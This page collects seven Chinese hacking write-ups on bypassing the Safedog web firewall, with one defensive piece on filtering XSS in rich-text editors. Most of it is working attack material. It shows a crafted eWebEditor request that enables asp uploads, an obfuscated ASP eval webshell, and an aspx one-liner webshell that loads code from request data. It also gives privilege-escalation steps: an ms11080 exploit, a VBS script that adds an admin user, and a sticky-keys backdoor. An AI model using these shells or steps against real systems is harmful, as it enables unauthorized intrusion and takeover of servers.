问题ewebeditor编辑器突破安全狗

| 收藏本文 下载本文 作者:点绛

以下是小编为大家准备了问题ewebeditor编辑器突破安全狗(共含7篇),欢迎参阅。同时,但愿您也能像本文投稿人“点绛”一样,积极向本站投稿分享好文章。

问题ewebeditor编辑器突破安全狗

篇1:问题ewebeditor编辑器突破安全狗

题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?

1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了,

2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。

当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。

1.问题ewebeditor

2.服务器装有安全狗

下面是我测试的过程:

首先当然是增加样式,但是常规的post提交失败,于是我想到了想这样的在老程序他一般都是使用request接受数据的,于是乎我下载了源码看了下,如果如此:

01 ' 检测样式表单提交的有效性

02 sStyleName = Trim(Request(“d_name”))

03 sStyleDir = Trim(Request(“d_dir”))

04 sStyleCSS = Trim(Request(“d_css”))

05 sStyleUploadDir = Trim(Request(“d_uploaddir”))

06 sStyleBaseHref = Trim(Request(“d_basehref”))

07 sStyleContentPath = Trim(Request(“d_contentpath”))

08 sStyleWidth = Trim(Request(“d_width”))

09 sStyleHeight = Trim(Request(“d_height”))

10 sStyleMemo = Request(“d_memo”)

11 sStyleImageExt = Request(“d_imageext”)

12 sStyleFlashExt = Request(“d_flashext”)

13 sStyleMediaExt = Request(“d_mediaext”)

14 sStyleRemoteExt = Request(“d_remoteext”)

15 sStyleFileExt = Request(“d_fileext”)

16 sStyleImageSize = Request(“d_imagesize”)

17 sStyleFlashSize = Request(“d_flashsize”)

18 sStyleMediaSize = Request(“d_mediasize”)

19 sStyleRemoteSize = Request(“d_remotesize”)

20 sStyleFileSize = Request(“d_filesize”)

21 sStyleStateFlag = Request(“d_stateflag”)

22 sStyleAutoRemote = Request(“d_autoremote”)

23 sStyleShowBorder = Request(“d_showborder”)

24 sStyleUploadObject = Request(“d_uploadobject”)

25 sStyleAutoDir = Request(“d_autodir”)

26 sStyleDetectFromWord = Request(“d_detectfromword”)

27 sStyleInitMode = Request(“d_initmode”)

28 sStyleBaseUrl = Request(“d_baseurl”)

他的数据接受都是request,也就是说他会接受post和get和cookie提交上去的数据。

当然此处post失效了,所以我抓了下包,得到如下数据

01 www.2cto.com /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50

02

03 POST /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 HTTP/1.1

04 Host: xxxx.com

05 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/0101 Firefox/12.0

06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

07 Accept-Language: en-US,en;q=0.5

08 Accept-Encoding: gzip, deflate

09 Connection: keep-alive

10 Referer: www.2cto.com /system/eWebEditor/admin_style.asp?action=styleset&id=50

11 Cookie: ASPSESSIONIDSABCQBBT=KHLJMNEAEKNNMGAMJAFHCPOK

12 Content-Type: application/x-www-form-urlencoded

13 Content-Length: 740

14 d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%3Basa.ass%3B.jpg&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11

于是使用构造get提交方式:

xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casaspp%7Ccer%7cASA&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11

然后直接访问时,他显示是提交成功了,实际上也米有成功,需要我们先访问:

xxxx.com/system/eWebEditor/admin_style.asp?action=styleset&id=50

然后在在地址栏中输入上边的get提交数据,就会显示成功,

这儿我们可以修改样式了,但是安全狗作怪使得asa、cer和asp;jpg等等的修改都无效,但是aaspsp这样的修改绕过去了安全狗,这儿可能是程序天然给我们的一个绕安全狗的方法吧!程序本身使用的代码有问题,他会替换aaspsp中完整的asp部分为空格使得剩下的部分还是asp,这儿的代码依旧是一个替换函数,就不多说了,前辈们已经写了很多了。就是这样的一个代码写法使得我们天然绕过了安全狗上传asp的文件了,重这里我们也可以得到启发,以后我们绕安全狗是不是也可以使用这样的代码写法去绕过,话不多说,留下余香。

接下来我曾填好了可以传的后缀asp,但是视乎目录有问题,以前默认的目录是uploadfiles这个文件目录,视乎是做了限制,于是我想到了修改上传文件目录,当然你可以仔细看我上边构造的哪个get提交上边的d_uploaddir属性的值是%2F,也就是一个/,于是我传上去的文件在根目录下。

当然这儿已经为我们上传做好了所有铺垫了,我们现在只需要一个可以绕过安全狗的马就ok了。

还记得以前解密一个asp木马的时候,里面有一个后门,当时只是以为那个是一个后门,但是后面有心人测试发现这个后门很是了得可以绕过护卫神,今天我又用它绕过了安全狗。

01 <%

02 codeds=“Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li”

03 execute (decode (codeds) )

04 Function DeCode (Coded)

05 On Error Resume Next

06 For i = 1 To Len (Coded)

07 Curchar = Mid (Coded, i, 1)

08 If Asc (Curchar) = 16 then

09 Curchar = chr (8)

10 Elseif Asc (Curchar) = 24 then

11 Curchar = chr (12)

12 Elseif Asc (Curchar) = 32 then

13 Curchar = chr (18)

14 Else

15 Curchar = chr (Asc (Curchar) -3)

16 End if

17 DeCode = Decode&Curchar

18 Next

19 End Function

20 'response.write(decode(codeds))

21 %>

最后突破成功!上传一句话成功!!!

from:lanu.sinaapp.com/jishuwenzhang/113.html

篇2:一次意外突破安全狗拿Shell

晚上闲来无事准备提权前几天拿的shell,无奈shell没有了进后台上传shell发先有狗。 aspx不支持。看了一个文章说安全狗“截断解析”无奈还是被拦截,

不说直接上图

截断解析是;x.asp;x.jpg  被拦截所以直接;x.asp  绕过狗思路最重要

篇3:可突破安全狗的aspx一句话

在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功,

服务端一句话木马:

<%@ Page Language=“C#” ValidateRequest=“false” %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端截图:

篇4:Shell下突破安全狗远程桌面守护

首先在Shell下把安全狗的安装配置给下来 默认安装路径:

C:Program FilesSafedogServerSafeDogGuardCenter 找到 ProGuardData.ini 下载文件到本地虚拟机

虚拟机安装安全狗 然后文件覆盖一下 打开安全狗就可以看到的鸟....计算机名字和端口的配置信息

接下来...改虚拟机的计算机名字 然后 就可以正常连接了...

篇5:记一次突破安全狗提权

,。果断丢御剑。

FCK编辑器拿shell还是比较简单的,直接二次上传。。

拿到shell之后看了一下,权限还是很大的,于是乎准备提权。先看下组件。

wscript.shell被删了。看下脚本探测。一看支持aspx ,果断换马。接着上传了个cmd到C:RECYCLER。。看看能不能执行命令、

可以执行命令。 ww. 但是net user却没回显,应该是net被禁用了、、果断上传ms11080。

成功添加用户。。但是连接的时候却这样

果断试下第二种方法。。把下面代码保存为1.vbs

Set o=CreateObject( “Shell.Users” )

Set z=o.create(“user”)

z.changePassword “12345”,“”

z.setting(“AccountType”)=3

然后以system权限运行,

。会添加一个用户user密码为12345、、

成功执行。。但是还是不行。。

估计是第三方软件阻止了。果断tasklist。。

原来有安全狗。。

试了下远控无果。。

于是准备劫持shift后门、、直接替换sethc。。

连接看看。。5下shift。没看到后门。

于是看了下进程。。发现是、、

果断替换MY_sethc。。5下shift。如图。

果断登录上去加用户。。无果

打开安全狗。。看下,被拦截了。

果断关闭帐号防护。因为net被禁用了,所以直接运行ms11080或1.vbs成功添加用户。如图。

篇6: 入门之富编辑器的跨站脚本问题脚本安全

富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户 POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对 IE浏览器.

一.首先是微软建议我们可能造成恶意脚本攻击的标签.

类似如下的

tag:

applet

base

basefont

bgsound

blink

body

embed

frame

frameset

head

html

ilayer

iframe

layer

link

meta

object

style

title

script

-----------------------------------

类似这类

必须删除.

二.针对HTML属性值的协议攻击.

tag:

dynsrc=

href=

lowsrc=

src=

background=

value=

action=

bgsound=

可能利用如下协议:

脚本伪协议

vbscript.:

javascript.:

文件类协议

ms-its:

mhtml:

data:

第三方协议

firefoxurl:

mocha:

livescript.:

---------------------------------

类似这类

如:

必须判断属性的用的啥协议,给个http:就好了.

三.针对普通HTML属性值的编码, 可利用HTML特性将属性值做编码绕过过滤.

&加 ASCII格式

---------------------------------

类似这类

必须判断属性的值&转换成 &

四.css样式style属性问题.

style属性可以和任意字符的标签结合,因此不是的问题,必须对style属性值做过滤.

behavior需指定域内也就是绝对路径的HTC文件,危害不大.

expression可以构造不同的全角字符和注释符来扰乱过滤规则.

如:

---------------------------------

类似这类

必须判断style属性的值, :( ~这里正则超级难写,实在不过滤的话,列个白名单,只允许某些值.

五.css样式style属性其他问题.

xxx.com/mozxss.xml#xss)“>

---------------------------------

类似这类

还是判断协议头之类吧.

六.针对普通style属性值的编码, 可利用HTML特性将属性值做编码绕过过滤.

转义字符 加 16进制格式

---------------------------------

类似这类

搞个正则过滤+数字的字符串.

七.针对正常标签组合事件触发脚本的问题.

可以利用类似事件触发脚本:

onload

onerror

onmousemove

onmouseout

onmouseover

onmouseup

onmouseenter

onmouseleave

onmousewheel

onscroll

....................................

类似这类

如:

情况都给过滤吧.

八.第三方媒体文件,崭只针对FLASH与WEB交互的问题.

FLASH的Action Script比较危险,可以和用户做交互式的访问.

可以设置Flash对象的AllowScriptAccess参数为never来解决问题,

入门之富文本编辑器的跨站脚本问题脚本安全

AllowScriptAccess 参数有三个可选值,always、never 和 sameDomain

never 禁止运行对外脚本

always 可以运行对外脚本

sameDomain 只允许同一域下的Flash运行对外脚本

pluginspage=”www.macromedia.com/go/getflashplayer“ type=”application/x-shockwave-flash“ width=”550“ height=”400“ AllowScriptAccess=”never">

篇7:遇到一个比安全狗还 的不知名软件之突破法

手工翻了下,找到了后台,然后尝试各种弱口令无果,继续看的时候看见标题siteserver cms

然后去百度了一下,最个新出来的网站系统,好像没被挖过漏洞,我对于挖洞不太熟,就不献丑了,

扫描器扫着的时候扫到了压缩包,解压出来一看,数据库是mdb的,然后打开看了下,账号是apex,

密码好像是base64编码,但是去解密了一下是乱码,那就不对了,估计是采用的base64+自定义混合算法,

这里就不琢磨了,翻数据库的时候翻到question和answer,是问题和答案,直接找回密码,这下进去了,

遇到一个比安全狗还 的不知名软件之突破法

但是悲剧地是我找遍了整个站,上传后缀也改了n次,就是进不去,无奈只有慢慢研究了,一个小时后

得出结论,有软件在作怪,因为正常图片可以进去,马就进不去,然后翻了下模板,自定义模板的地方,

添加个单页,传了个最新研究出来的专门过这种不知名软件的马,如图

至于如何突破的,思路其实已经说出来了。

浅析asp版本ewebeditor在线编辑器

教你突破雅思听力发音问题

WPS数学公式编辑器使用方法

成狗期狗狗的肥胖问题

IBM公司笔试题:病狗问题

安全保卫工作存在问题

命题作文突破

突破作文

突破作文

linux下vi编辑器命令入门

问题ewebeditor编辑器突破安全狗(合集7篇)

欢迎下载DOC格式的问题ewebeditor编辑器突破安全狗,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式

猜你喜欢

NEW
点击下载本文文档